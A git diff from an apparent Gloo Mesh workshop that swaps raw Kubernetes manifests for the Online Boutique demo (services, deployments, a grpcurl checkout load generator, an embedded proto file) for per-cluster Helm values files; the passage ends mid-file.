diff --git a/workshops/gloo-mesh-demo/install/online-boutique/backend-apis-values.yaml b/workshops/gloo-mesh-demo/install/online-boutique/backend-apis-values.yaml new file mode 100644 index 0000000..2f841c9 --- /dev/null +++ b/workshops/gloo-mesh-demo/install/online-boutique/backend-apis-values.yaml @@ -0,0 +1,50 @@ +clusterName: cluster1 + +endpoints: + productCatalogService: 'productcatalogservice.backend-apis.svc.cluster.local:3550' + +images: + repository: gcr.io/solo-test-236622 + # Overrides the image tag whose default is the chart appVersion. + tag: "1.3" + +serviceAccounts: + # Specifies whether service accounts should be created. + create: true + +shippingService: + create: false + +checkoutService: + create: false + +paymentService: + create: false + +frontend: + create: false + +loadGenerator: + create: false + +adService: + create: true + +cartService: + create: true + +currencyService: + create: true + +emailService: + create: true + +productCatalogService: + create: true + +recommendationService: + create: true + +cartDatabase: + inClusterRedis: + create: true \ No newline at end of file diff --git a/workshops/gloo-mesh-demo/install/online-boutique/backend-apis.yaml b/workshops/gloo-mesh-demo/install/online-boutique/backend-apis.yaml deleted file mode 100644 index afc3490..0000000 --- a/workshops/gloo-mesh-demo/install/online-boutique/backend-apis.yaml +++ /dev/null 
@@ -1,362 +0,0 @@ -apiVersion: v1 -kind: Namespace -metadata: - name: backend-apis - labels: - istio-injection: enabled ---- -########################################################### -## Services -########################################################### ---- -apiVersion: v1 -kind: Service -metadata: - name: recommendationservice - namespace: backend-apis - labels: - app: recommendationservice -spec: - type: ClusterIP - selector: - app: recommendationservice - ports: - - name: grpc - port: 8080 - targetPort: 8080 ---- -apiVersion: v1 -kind: Service -metadata: - name: productcatalogservice - namespace: backend-apis - labels: - app: productcatalogservice -spec: - selector: - app: productcatalogservice - ports: - - name: grpc - port: 3550 - targetPort: 3550 ---- -apiVersion: v1 -kind: Service -metadata: - name: emailservice - namespace: backend-apis - labels: - app: emailservice -spec: - selector: - app: emailservice - ports: - - name: grpc - port: 5000 - targetPort: 8080 ---- -apiVersion: v1 -kind: Service -metadata: - name: currencyservice - namespace: backend-apis - labels: - app: currencyservice -spec: - selector: - app: currencyservice - ports: - - name: grpc - port: 7000 - targetPort: 7000 ---- -apiVersion: v1 -kind: Service -metadata: - name: cartservice - namespace: backend-apis - labels: - app: cartservice -spec: - selector: - app: cartservice - ports: - - name: grpc - port: 7070 - targetPort: 7070 ---- -apiVersion: v1 -kind: Service -metadata: - name: adservice - namespace: backend-apis - labels: - app: adservice -spec: - selector: - app: adservice - ports: - - name: grpc - port: 9555 - targetPort: 9555 ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: recommendation - namespace: backend-apis ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: recommendationservice - namespace: backend-apis -spec: - selector: - matchLabels: - app: recommendationservice - template: - metadata: - labels: - app: recommendationservice - spec: - 
serviceAccountName: recommendation - terminationGracePeriodSeconds: 5 - containers: - - name: server - image: gcr.io/solo-test-236622/recommendationservice:solo-build - ports: - - containerPort: 8080 - readinessProbe: - periodSeconds: 5 - exec: - command: ["/bin/grpc_health_probe", "-addr=:8080"] - livenessProbe: - periodSeconds: 5 - exec: - command: ["/bin/grpc_health_probe", "-addr=:8080"] - env: - - name: PORT - value: "8080" - - name: PRODUCT_CATALOG_SERVICE_ADDR - value: "productcatalogservice.backend-apis.svc.cluster.local:3550" - - name: DISABLE_TRACING - value: "1" - - name: DISABLE_PROFILER - value: "1" - - name: DISABLE_DEBUGGER - value: "1" ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: product-catalog - namespace: backend-apis ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: productcatalogservice - namespace: backend-apis -spec: - selector: - matchLabels: - app: productcatalogservice - template: - metadata: - labels: - app: productcatalogservice - spec: - serviceAccountName: product-catalog - terminationGracePeriodSeconds: 5 - containers: - - name: server - image: gcr.io/solo-test-236622/productcatalogservice:solo-build - ports: - - containerPort: 3550 - env: - - name: PORT - value: "3550" - - name: DISABLE_STATS - value: "1" - - name: DISABLE_TRACING - value: "1" - - name: DISABLE_PROFILER - value: "1" - readinessProbe: - exec: - command: ["/bin/grpc_health_probe", "-addr=:3550"] - livenessProbe: - exec: - command: ["/bin/grpc_health_probe", "-addr=:3550"] ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: email - namespace: backend-apis ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: emailservice - namespace: backend-apis -spec: - selector: - matchLabels: - app: emailservice - template: - metadata: - labels: - app: emailservice - spec: - serviceAccountName: email - containers: - - name: server - image: gcr.io/solo-test-236622/emailservice:solo-build - ports: - - containerPort: 8080 - env: - - 
name: PORT - value: "8080" - - name: DISABLE_TRACING - value: "1" - - name: DISABLE_PROFILER - value: "1" - readinessProbe: - periodSeconds: 5 - exec: - command: ["/bin/grpc_health_probe", "-addr=:8080"] - livenessProbe: - periodSeconds: 5 - exec: - command: ["/bin/grpc_health_probe", "-addr=:8080"] ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: currency - namespace: backend-apis ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: currencyservice - namespace: backend-apis -spec: - selector: - matchLabels: - app: currencyservice - template: - metadata: - labels: - app: currencyservice - spec: - serviceAccountName: currency - terminationGracePeriodSeconds: 5 - containers: - - name: server - image: gcr.io/solo-test-236622/currencyservice:solo-build - ports: - - name: grpc - containerPort: 7000 - env: - - name: PORT - value: "7000" - - name: DISABLE_TRACING - value: "1" - - name: DISABLE_PROFILER - value: "1" - - name: DISABLE_DEBUGGER - value: "1" - readinessProbe: - exec: - command: ["/bin/grpc_health_probe", "-addr=:7000"] - livenessProbe: - exec: - command: ["/bin/grpc_health_probe", "-addr=:7000"] ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: cart - namespace: backend-apis ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: cartservice - namespace: backend-apis -spec: - selector: - matchLabels: - app: cartservice - template: - metadata: - labels: - app: cartservice - spec: - serviceAccountName: cart - terminationGracePeriodSeconds: 5 - containers: - - name: server - image: gcr.io/solo-test-236622/cartservice:solo-build - ports: - - containerPort: 7070 - env: - - name: REDIS_ADDR - value: "" - readinessProbe: - initialDelaySeconds: 15 - exec: - command: ["/bin/grpc_health_probe", "-addr=:7070", "-rpc-timeout=5s"] - livenessProbe: - initialDelaySeconds: 15 - periodSeconds: 10 - exec: - command: ["/bin/grpc_health_probe", "-addr=:7070", "-rpc-timeout=5s"] ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - 
name: ad - namespace: backend-apis ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: adservice - namespace: backend-apis -spec: - selector: - matchLabels: - app: adservice - template: - metadata: - labels: - app: adservice - spec: - serviceAccountName: ad - terminationGracePeriodSeconds: 5 - containers: - - name: server - image: gcr.io/solo-test-236622/adservice:solo-build - ports: - - containerPort: 9555 - env: - - name: PORT - value: "9555" - - name: DISABLE_STATS - value: "1" - - name: DISABLE_TRACING - value: "1" - readinessProbe: - initialDelaySeconds: 20 - periodSeconds: 15 - exec: - command: ["/bin/grpc_health_probe", "-addr=:9555"] - livenessProbe: - initialDelaySeconds: 20 - periodSeconds: 15 - exec: - command: ["/bin/grpc_health_probe", "-addr=:9555"] diff --git a/workshops/gloo-mesh-demo/install/online-boutique/checkout-feature.yaml b/workshops/gloo-mesh-demo/install/online-boutique/checkout-feature.yaml deleted file mode 100644 index 06cedb4..0000000 --- a/workshops/gloo-mesh-demo/install/online-boutique/checkout-feature.yaml +++ /dev/null 
@@ -1,554 +0,0 @@ -apiVersion: v1 -kind: Namespace -metadata: - name: backend-apis - labels: - istio-injection: enabled ---- -########################################################### -## Services -########################################################### -apiVersion: v1 -kind: Service -metadata: - name: shippingservice - namespace: backend-apis - labels: - app: shippingservice -spec: - type: ClusterIP - selector: - app: shippingservice - ports: - - name: grpc - port: 50051 - targetPort: 50051 ---- -apiVersion: v1 -kind: Service -metadata: - name: paymentservice - namespace: backend-apis - labels: - app: paymentservice -spec: - selector: - app: paymentservice - ports: - - name: grpc - port: 50051 - targetPort: 50051 ---- -apiVersion: v1 -kind: Service -metadata: - name: checkoutservice - namespace: backend-apis - labels: - app: checkoutservice -spec: - selector: - app: checkoutservice - ports: - - name: grpc - port: 5050 - targetPort: 5050 ---- -########################################################### -## Deployments -########################################################### -apiVersion: v1 -kind: ServiceAccount -metadata: - name: shipping - namespace: backend-apis ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: shippingservice - namespace: backend-apis -spec: - selector: - matchLabels: - app: shippingservice - template: - metadata: - labels: - app: shippingservice - spec: - serviceAccountName: shipping - containers: - - name: server - image: gcr.io/solo-test-236622/shippingservice:solo-build - ports: - - containerPort: 50051 - env: - - name: PORT - value: "50051" - - name: DISABLE_STATS - value: "1" - - name: DISABLE_TRACING - value: "1" - - name: DISABLE_PROFILER - value: "1" - # - name: JAEGER_SERVICE_ADDR - # value: "jaeger-collector:14268" - readinessProbe: - periodSeconds: 5 - exec: - command: ["/bin/grpc_health_probe", "-addr=:50051"] - livenessProbe: - exec: - command: ["/bin/grpc_health_probe", "-addr=:50051"] - resources: - 
requests: - cpu: 100m - memory: 64Mi ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: payment - namespace: backend-apis ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: paymentservice - namespace: backend-apis -spec: - selector: - matchLabels: - app: paymentservice - template: - metadata: - labels: - app: paymentservice - spec: - serviceAccountName: payment - terminationGracePeriodSeconds: 5 - containers: - - name: server - image: gcr.io/solo-test-236622/paymentservice:solo-build - ports: - - containerPort: 50051 - env: - - name: PORT - value: "50051" - - name: DISABLE_TRACING - value: "1" - - name: DISABLE_PROFILER - value: "1" - - name: DISABLE_DEBUGGER - value: "1" - readinessProbe: - exec: - command: ["/bin/grpc_health_probe", "-addr=:50051"] - livenessProbe: - exec: - command: ["/bin/grpc_health_probe", "-addr=:50051"] - resources: - requests: - cpu: 100m - memory: 64Mi ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: checkout - namespace: backend-apis ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: checkoutservice - namespace: backend-apis -spec: - selector: - matchLabels: - app: checkoutservice - template: - metadata: - labels: - app: checkoutservice - spec: - serviceAccountName: checkout - containers: - - name: server - image: gcr.io/solo-test-236622/checkoutservice:solo-build - imagePullPolicy: IfNotPresent - ports: - - containerPort: 5050 - readinessProbe: - exec: - command: ["/bin/grpc_health_probe", "-addr=:5050"] - livenessProbe: - exec: - command: ["/bin/grpc_health_probe", "-addr=:5050"] - env: - - name: PORT - value: "5050" - - name: PRODUCT_CATALOG_SERVICE_ADDR - value: "product-catalog.backend-apis-team.solo-io.mesh:80" - - name: SHIPPING_SERVICE_ADDR - value: "shipping.backend-apis-team.solo-io.mesh:80" - - name: PAYMENT_SERVICE_ADDR - value: "paymentservice.backend-apis.svc.cluster.local:50051" - - name: EMAIL_SERVICE_ADDR - value: "emailservice.backend-apis.svc.cluster.local:5000" - - name: 
CURRENCY_SERVICE_ADDR - value: "currency.backend-apis-team.solo-io.mesh:80" - - name: CART_SERVICE_ADDR - value: "cart.backend-apis-team.solo-io.mesh:80" - - name: DISABLE_STATS - value: "1" - - name: DISABLE_TRACING - value: "1" - - name: DISABLE_PROFILER - value: "1" - - name: KUBERNETES_CLUSTER_NAME - value: cluster2 - # - name: JAEGER_SERVICE_ADDR - # value: "jaeger-collector:14268" - resources: - requests: - cpu: 100m - memory: 64Mi ---- ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: checkout-loadgenerator - namespace: backend-apis ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: checkout-loadgenerator - namespace: backend-apis -spec: - selector: - matchLabels: - app: checkout-loadgenerator - replicas: 1 - template: - metadata: - labels: - app: checkout-loadgenerator - annotations: - sidecar.istio.io/rewriteAppHTTPProbers: "true" - spec: - serviceAccountName: checkout-loadgenerator - terminationGracePeriodSeconds: 5 - restartPolicy: Always - containers: - - name: main - image: golang:1.15.15 - env: - - name: GO111MODULE - value: "on" - command: - - /bin/sh - - -c - - > - go get github.com/fullstorydev/grpcurl/cmd/grpcurl@latest && i=0; - while [ $i -lt 10000 ]; - do - grpcurl --plaintext -d "{ \"userCurrency\": \"USD\", \"creditCard\": { \"creditCardNumber\": \"4432-8015-6152-0454\", \"creditCardCvv\": 123, \"creditCardExpirationYear\": 2023, \"creditCardExpirationMonth\": 12 }, \"address\": { \"streetAddress\": \"1600 Amphitheatre Parkway\", \"zipCode\": 94043, \"city\": \"Mountain View\", \"state\": \"CA\", \"country\": \"United States\" }, \"email\": \"someone@example.com\" }" -v --proto /demo.proto -import-path / checkout.backend-apis-team.solo-io.mesh:80 hipstershop.CheckoutService/PlaceOrder - grpcurl --plaintext -d "{ \"userCurrency\": \"USD\", \"creditCard\": { \"creditCardNumber\": \"4432-8015-6152-0454\", \"creditCardCvv\": 123, \"creditCardExpirationYear\": 2023, \"creditCardExpirationMonth\": 12 }, \"address\": { 
\"streetAddress\": \"1600 Amphitheatre Parkway\", \"zipCode\": 94043, \"city\": \"Mountain View\", \"state\": \"CA\", \"country\": \"United States\" }, \"email\": \"someone@example.com\" }" -v --proto /demo.proto -import-path / checkoutservice.backend-apis.svc.cluster.local:5050 hipstershop.CheckoutService/PlaceOrder - sleep 1 - done - volumeMounts: - - name: "protos" - mountPath: "/demo.proto" - subPath: "demo.proto" - volumes: - - name: "protos" - configMap: - name: "online-boutique-proto" ---- -apiVersion: v1 -kind: Service -metadata: - name: checkout-loadgenerator - namespace: backend-apis - labels: - app: loadgenerator -spec: - type: ClusterIP - selector: - app: checkout-loadgenerator - ports: - - name: http - port: 80 - targetPort: 8080 ---- -apiVersion: v1 -kind: ConfigMap -metadata: - name: online-boutique-proto - namespace: backend-apis -data: - demo.proto: | - // Copyright 2020 Google LLC - // - // Licensed under the Apache License, Version 2.0 (the "License"); - // you may not use this file except in compliance with the License. - // You may obtain a copy of the License at - // - // http://www.apache.org/licenses/LICENSE-2.0 - // - // Unless required by applicable law or agreed to in writing, software - // distributed under the License is distributed on an "AS IS" BASIS, - // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - // See the License for the specific language governing permissions and - // limitations under the License. 
- - syntax = "proto3"; - - package hipstershop; - - // -----------------Cart service----------------- - - service CartService { - rpc AddItem(AddItemRequest) returns (Empty) {} - rpc GetCart(GetCartRequest) returns (Cart) {} - rpc EmptyCart(EmptyCartRequest) returns (Empty) {} - } - - message CartItem { - string product_id = 1; - int32 quantity = 2; - } - - message AddItemRequest { - string user_id = 1; - CartItem item = 2; - } - - message EmptyCartRequest { - string user_id = 1; - } - - message GetCartRequest { - string user_id = 1; - } - - message Cart { - string user_id = 1; - repeated CartItem items = 2; - } - - message Empty {} - - // ---------------Recommendation service---------- - - service RecommendationService { - rpc ListRecommendations(ListRecommendationsRequest) returns (ListRecommendationsResponse){} - } - - message ListRecommendationsRequest { - string user_id = 1; - repeated string product_ids = 2; - } - - message ListRecommendationsResponse { - repeated string product_ids = 1; - } - - // ---------------Product Catalog---------------- - - service ProductCatalogService { - rpc ListProducts(Empty) returns (ListProductsResponse) {} - rpc GetProduct(GetProductRequest) returns (Product) {} - rpc SearchProducts(SearchProductsRequest) returns (SearchProductsResponse) {} - } - - message Product { - string id = 1; - string name = 2; - string description = 3; - string picture = 4; - Money price_usd = 5; - - // Categories such as "clothing" or "kitchen" that can be used to look up - // other related products. 
- repeated string categories = 6; - } - - message ListProductsResponse { - repeated Product products = 1; - } - - message GetProductRequest { - string id = 1; - } - - message SearchProductsRequest { - string query = 1; - } - - message SearchProductsResponse { - repeated Product results = 1; - } - - // ---------------Shipping Service---------- - - service ShippingService { - rpc GetQuote(GetQuoteRequest) returns (GetQuoteResponse) {} - rpc ShipOrder(ShipOrderRequest) returns (ShipOrderResponse) {} - } - - message GetQuoteRequest { - Address address = 1; - repeated CartItem items = 2; - } - - message GetQuoteResponse { - Money cost_usd = 1; - } - - message ShipOrderRequest { - Address address = 1; - repeated CartItem items = 2; - } - - message ShipOrderResponse { - string tracking_id = 1; - } - - message Address { - string street_address = 1; - string city = 2; - string state = 3; - string country = 4; - int32 zip_code = 5; - } - - // -----------------Currency service----------------- - - service CurrencyService { - rpc GetSupportedCurrencies(Empty) returns (GetSupportedCurrenciesResponse) {} - rpc Convert(CurrencyConversionRequest) returns (Money) {} - } - - // Represents an amount of money with its currency type. - message Money { - // The 3-letter currency code defined in ISO 4217. - string currency_code = 1; - - // The whole units of the amount. - // For example if `currencyCode` is `"USD"`, then 1 unit is one US dollar. - int64 units = 2; - - // Number of nano (10^-9) units of the amount. - // The value must be between -999,999,999 and +999,999,999 inclusive. - // If `units` is positive, `nanos` must be positive or zero. - // If `units` is zero, `nanos` can be positive, zero, or negative. - // If `units` is negative, `nanos` must be negative or zero. - // For example $-1.75 is represented as `units`=-1 and `nanos`=-750,000,000. - int32 nanos = 3; - } - - message GetSupportedCurrenciesResponse { - // The 3-letter currency code defined in ISO 4217. 
- repeated string currency_codes = 1; - } - - message CurrencyConversionRequest { - Money from = 1; - - // The 3-letter currency code defined in ISO 4217. - string to_code = 2; - } - - // -------------Payment service----------------- - - service PaymentService { - rpc Charge(ChargeRequest) returns (ChargeResponse) {} - } - - message CreditCardInfo { - string credit_card_number = 1; - int32 credit_card_cvv = 2; - int32 credit_card_expiration_year = 3; - int32 credit_card_expiration_month = 4; - } - - message ChargeRequest { - Money amount = 1; - CreditCardInfo credit_card = 2; - } - - message ChargeResponse { - string transaction_id = 1; - } - - // -------------Email service----------------- - - service EmailService { - rpc SendOrderConfirmation(SendOrderConfirmationRequest) returns (Empty) {} - } - - message OrderItem { - CartItem item = 1; - Money cost = 2; - } - - message OrderResult { - string order_id = 1; - string shipping_tracking_id = 2; - Money shipping_cost = 3; - Address shipping_address = 4; - repeated OrderItem items = 5; - } - - message SendOrderConfirmationRequest { - string email = 1; - OrderResult order = 2; - } - - - // -------------Checkout service----------------- - - service CheckoutService { - rpc PlaceOrder(PlaceOrderRequest) returns (PlaceOrderResponse) {} - } - - message PlaceOrderRequest { - string user_id = 1; - string user_currency = 2; - - Address address = 3; - string email = 5; - CreditCardInfo credit_card = 6; - } - - message PlaceOrderResponse { - OrderResult order = 1; - } - - // ------------Ad service------------------ - - service AdService { - rpc GetAds(AdRequest) returns (AdResponse) {} - } - - message AdRequest { - // List of important key words from the current page describing the context. - repeated string context_keys = 1; - } - - message AdResponse { - repeated Ad ads = 1; - } - - message Ad { - // url to redirect to when an ad is clicked. - string redirect_url = 1; - - // short advertisement text to display. 
- string text = 2; - } diff --git a/workshops/gloo-mesh-demo/install/online-boutique/checkout-values.yaml b/workshops/gloo-mesh-demo/install/online-boutique/checkout-values.yaml new file mode 100644 index 0000000..ffd3d20 --- /dev/null +++ b/workshops/gloo-mesh-demo/install/online-boutique/checkout-values.yaml @@ -0,0 +1,59 @@ +clusterName: cluster2 + +endpoints: + productCatalogService: 'product-catalog.backend-apis-team.solo-io.mesh:80' + currencyService: 'currency.backend-apis-team.solo-io.mesh:80' + recommendationService: 'recommendations.backend-apis-team.solo-io.mesh:80' + shippingService: 'shipping.backend-apis-team.solo-io.mesh:80' + checkoutService: 'checkout.backend-apis-team.solo-io.mesh:80' + adService: 'ads.backend-apis-team.solo-io.mesh:80' + cartService: 'cart.backend-apis-team.solo-io.mesh:80' + paymentService: 'paymentservice.backend-apis.svc.cluster.local:50051' + emailService: 'emailservice.backend-apis.svc.cluster.local:5000' + + +images: + repository: gcr.io/solo-test-236622 + # Overrides the image tag whose default is the chart appVersion. + tag: "1.3" + +serviceAccounts: + # Specifies whether service accounts should be created. + create: true + +frontend: + create: false + +loadGenerator: + create: false + +adService: + create: false + +cartService: + create: false + +checkoutService: + create: true + +currencyService: + create: false + +emailService: + create: false + +paymentService: + create: true + +productCatalogService: + create: false + +recommendationService: + create: false + +shippingService: + create: true + +cartDatabase: + inClusterRedis: + create: false \ No newline at end of file diff --git a/workshops/gloo-mesh-demo/install/online-boutique/httpbin.yaml b/workshops/gloo-mesh-demo/install/online-boutique/httpbin.yaml deleted file mode 100644 index 0b5938d..0000000 --- a/workshops/gloo-mesh-demo/install/online-boutique/httpbin.yaml +++ /dev/null 
@@ -1,51 +0,0 @@ -apiVersion: v1 -kind: Namespace -metadata: - name: web-ui - labels: - istio-injection: enabled ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: in-mesh ---- -apiVersion: v1 -kind: Service -metadata: - name: in-mesh - labels: - app: in-mesh - service: in-mesh -spec: - ports: - - name: http - port: 8000 - targetPort: 80 - selector: - app: in-mesh ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: in-mesh -spec: - replicas: 1 - selector: - matchLabels: - app: in-mesh - version: v1 - template: - metadata: - labels: - app: in-mesh - version: v1 - istio.io/rev: 1-11 - spec: - serviceAccountName: in-mesh - containers: - - image: docker.io/kennethreitz/httpbin - imagePullPolicy: IfNotPresent - name: in-mesh - ports: - - containerPort: 80 \ No newline at end of file diff --git a/workshops/gloo-mesh-demo/install/online-boutique/web-ui-cluster2-values.yaml b/workshops/gloo-mesh-demo/install/online-boutique/web-ui-cluster2-values.yaml new file mode 100644 index 0000000..6ed573b --- /dev/null +++ b/workshops/gloo-mesh-demo/install/online-boutique/web-ui-cluster2-values.yaml 
@@ -0,0 +1,56 @@ +clusterName: cluster2 + +endpoints: + productCatalogService: 'product-catalog.backend-apis-team.solo-io.mesh:80' + currencyService: 'currency.backend-apis-team.solo-io.mesh:80' + recommendationService: 'recommendations.backend-apis-team.solo-io.mesh:80' + shippingService: 'shipping.backend-apis-team.solo-io.mesh:80' + checkoutService: 'checkout.backend-apis-team.solo-io.mesh:80' + adService: 'ads.backend-apis-team.solo-io.mesh:80' + cartService: 'cart.backend-apis-team.solo-io.mesh:80' + +images: + repository: gcr.io/solo-test-236622 + # Overrides the image tag whose default is the chart appVersion. + tag: "1.3" + +serviceAccounts: + # Specifies whether service accounts should be created. + create: true + +frontend: + create: true + +loadGenerator: + create: false + +adService: + create: false + +cartService: + create: false + +checkoutService: + create: false + +currencyService: + create: false + +emailService: + create: false + +paymentService: + create: false + +productCatalogService: + create: false + +recommendationService: + create: false + +shippingService: + create: false + +cartDatabase: + inClusterRedis: + create: false \ No newline at end of file diff --git a/workshops/gloo-mesh-demo/install/online-boutique/web-ui-cluster2.yaml b/workshops/gloo-mesh-demo/install/online-boutique/web-ui-cluster2.yaml deleted file mode 100644 index 088525b..0000000 --- a/workshops/gloo-mesh-demo/install/online-boutique/web-ui-cluster2.yaml +++ /dev/null 
@@ -1,132 +0,0 @@ -apiVersion: v1 -kind: Namespace -metadata: - name: web-ui - labels: - istio-injection: enabled ---- -apiVersion: v1 -kind: Service -metadata: - name: frontend - namespace: web-ui - labels: - app: frontend -spec: - selector: - app: frontend - ports: - - name: http - port: 80 - targetPort: 8080 ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: frontend - namespace: web-ui ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRole -metadata: - name: view-nodes -rules: -- apiGroups: [""] - resources: ["nodes"] - verbs: ["get","list","watch"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRoleBinding -metadata: - name: read-nodes -subjects: -- kind: ServiceAccount - name: frontend - namespace: web-ui -roleRef: - kind: ClusterRole - name: view-nodes - apiGroup: rbac.authorization.k8s.io ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: frontend - namespace: web-ui - labels: - checkout-enabled: "true" -spec: - selector: - matchLabels: - app: frontend - template: - metadata: - labels: - app: frontend - annotations: - sidecar.istio.io/rewriteAppHTTPProbers: "true" - spec: - serviceAccountName: frontend - containers: - - name: server - image: gcr.io/solo-test-236622/frontend:solo-build - imagePullPolicy: IfNotPresent - ports: - - containerPort: 8080 - readinessProbe: - initialDelaySeconds: 10 - httpGet: - path: "/_healthz" - port: 8080 - httpHeaders: - - name: "Cookie" - value: "shop_session-id=x-readiness-probe" - livenessProbe: - initialDelaySeconds: 10 - httpGet: - path: "/_healthz" - port: 8080 - httpHeaders: - - name: "Cookie" - value: "shop_session-id=x-liveness-probe" - env: - - name: PORT - value: "8080" - - name: AD_SERVICE_ADDR - value: "ads.backend-apis-team.solo-io.mesh:80" - - name: CART_SERVICE_ADDR - value: "cart.backend-apis-team.solo-io.mesh:80" - - name: RECOMMENDATION_SERVICE_ADDR - value: "recommendations.backend-apis-team.solo-io.mesh:80" - - name: SHIPPING_SERVICE_ADDR - value: 
"shipping.backend-apis-team.solo-io.mesh:80" - - name: CHECKOUT_SERVICE_ADDR - value: "checkout.backend-apis-team.solo-io.mesh:80" - - name: PRODUCT_CATALOG_SERVICE_ADDR - value: "product-catalog.backend-apis-team.solo-io.mesh:80" - - name: CURRENCY_SERVICE_ADDR - value: "currency.backend-apis-team.solo-io.mesh:80" - # # ENV_PLATFORM: One of: local, gcp, aws, azure, onprem - # # When not set, defaults to "local" unless running in GKE, otherwies auto-sets to gcp - - name: ENV_PLATFORM - value: "onprem" - - name: DISABLE_TRACING - value: "1" - - name: DISABLE_PROFILER - value: "1" - - name: KUBERNETES_NODE_NAME - valueFrom: - fieldRef: - fieldPath: spec.nodeName - - name: KUBERNETES_POD_NAME - valueFrom: - fieldRef: - fieldPath: metadata.name - - name: KUBERNETES_NAMESPACE - valueFrom: - fieldRef: - fieldPath: metadata.namespace - - name: KUBERNETES_CLUSTER_NAME - value: cluster2 - # - name: JAEGER_SERVICE_ADDR - # value: "jaeger-collector:14268" diff --git a/workshops/gloo-mesh-demo/install/online-boutique/web-ui-values.yaml b/workshops/gloo-mesh-demo/install/online-boutique/web-ui-values.yaml new file mode 100644 index 0000000..cf2caa3 --- /dev/null +++ b/workshops/gloo-mesh-demo/install/online-boutique/web-ui-values.yaml 
@@ -0,0 +1,56 @@ +clusterName: cluster1 + +endpoints: + productCatalogService: 'productcatalogservice.backend-apis.svc.cluster.local:3550' + currencyService: 'currencyservice.backend-apis.svc.cluster.local:7000' + recommendationService: 'recommendationservice.backend-apis.svc.cluster.local:8080' + shippingService: 'shipping.backend-apis-team.solo-io.mesh:80' + checkoutService: 'checkout.backend-apis-team.solo-io.mesh:80' + adService: 'adservice.backend-apis.svc.cluster.local:9555' + cartService: 'cartservice.backend-apis.svc.cluster.local:7070' + +images: + repository: gcr.io/solo-test-236622 + # Overrides the image tag whose default is the chart appVersion. + tag: "1.3" + +serviceAccounts: + # Specifies whether service accounts should be created. + create: true + +frontend: + create: true + +loadGenerator: + create: true + +adService: + create: false + +cartService: + create: false + +checkoutService: + create: false + +currencyService: + create: false + +emailService: + create: false + +paymentService: + create: false + +productCatalogService: + create: false + +recommendationService: + create: false + +shippingService: + create: false + +cartDatabase: + inClusterRedis: + create: false \ No newline at end of file diff --git a/workshops/gloo-mesh-demo/install/online-boutique/web-ui.yaml b/workshops/gloo-mesh-demo/install/online-boutique/web-ui.yaml deleted file mode 100644 index 71c1e69..0000000 --- a/workshops/gloo-mesh-demo/install/online-boutique/web-ui.yaml +++ /dev/null 
@@ -1,186 +0,0 @@ -apiVersion: v1 -kind: Namespace -metadata: - name: web-ui - labels: - istio-injection: enabled ---- -apiVersion: v1 -kind: Service -metadata: - name: frontend - namespace: web-ui - labels: - app: frontend -spec: - selector: - app: frontend - ports: - - name: http - port: 80 - targetPort: 8080 ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: frontend - namespace: web-ui ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRole -metadata: - name: view-nodes -rules: -- apiGroups: [""] - resources: ["nodes"] - verbs: ["get","list","watch"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRoleBinding -metadata: - name: read-nodes -subjects: -- kind: ServiceAccount - name: frontend - namespace: web-ui -roleRef: - kind: ClusterRole - name: view-nodes - apiGroup: rbac.authorization.k8s.io ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: frontend - namespace: web-ui - labels: - app: frontend -spec: - selector: - matchLabels: - app: frontend - template: - metadata: - labels: - app: frontend - annotations: - sidecar.istio.io/rewriteAppHTTPProbers: "true" - spec: - serviceAccountName: frontend - containers: - - name: server - image: gcr.io/solo-test-236622/frontend:solo-build - imagePullPolicy: IfNotPresent - ports: - - containerPort: 8080 - readinessProbe: - initialDelaySeconds: 10 - httpGet: - path: "/_healthz" - port: 8080 - httpHeaders: - - name: "Cookie" - value: "shop_session-id=x-readiness-probe" - livenessProbe: - initialDelaySeconds: 10 - httpGet: - path: "/_healthz" - port: 8080 - httpHeaders: - - name: "Cookie" - value: "shop_session-id=x-liveness-probe" - env: - - name: PORT - value: "8080" - - name: AD_SERVICE_ADDR - value: "adservice.backend-apis.svc.cluster.local:9555" - - name: CART_SERVICE_ADDR - value: "cartservice.backend-apis.svc.cluster.local:7070" - - name: RECOMMENDATION_SERVICE_ADDR - value: "recommendationservice.backend-apis.svc.cluster.local:8080" - - name: SHIPPING_SERVICE_ADDR - 
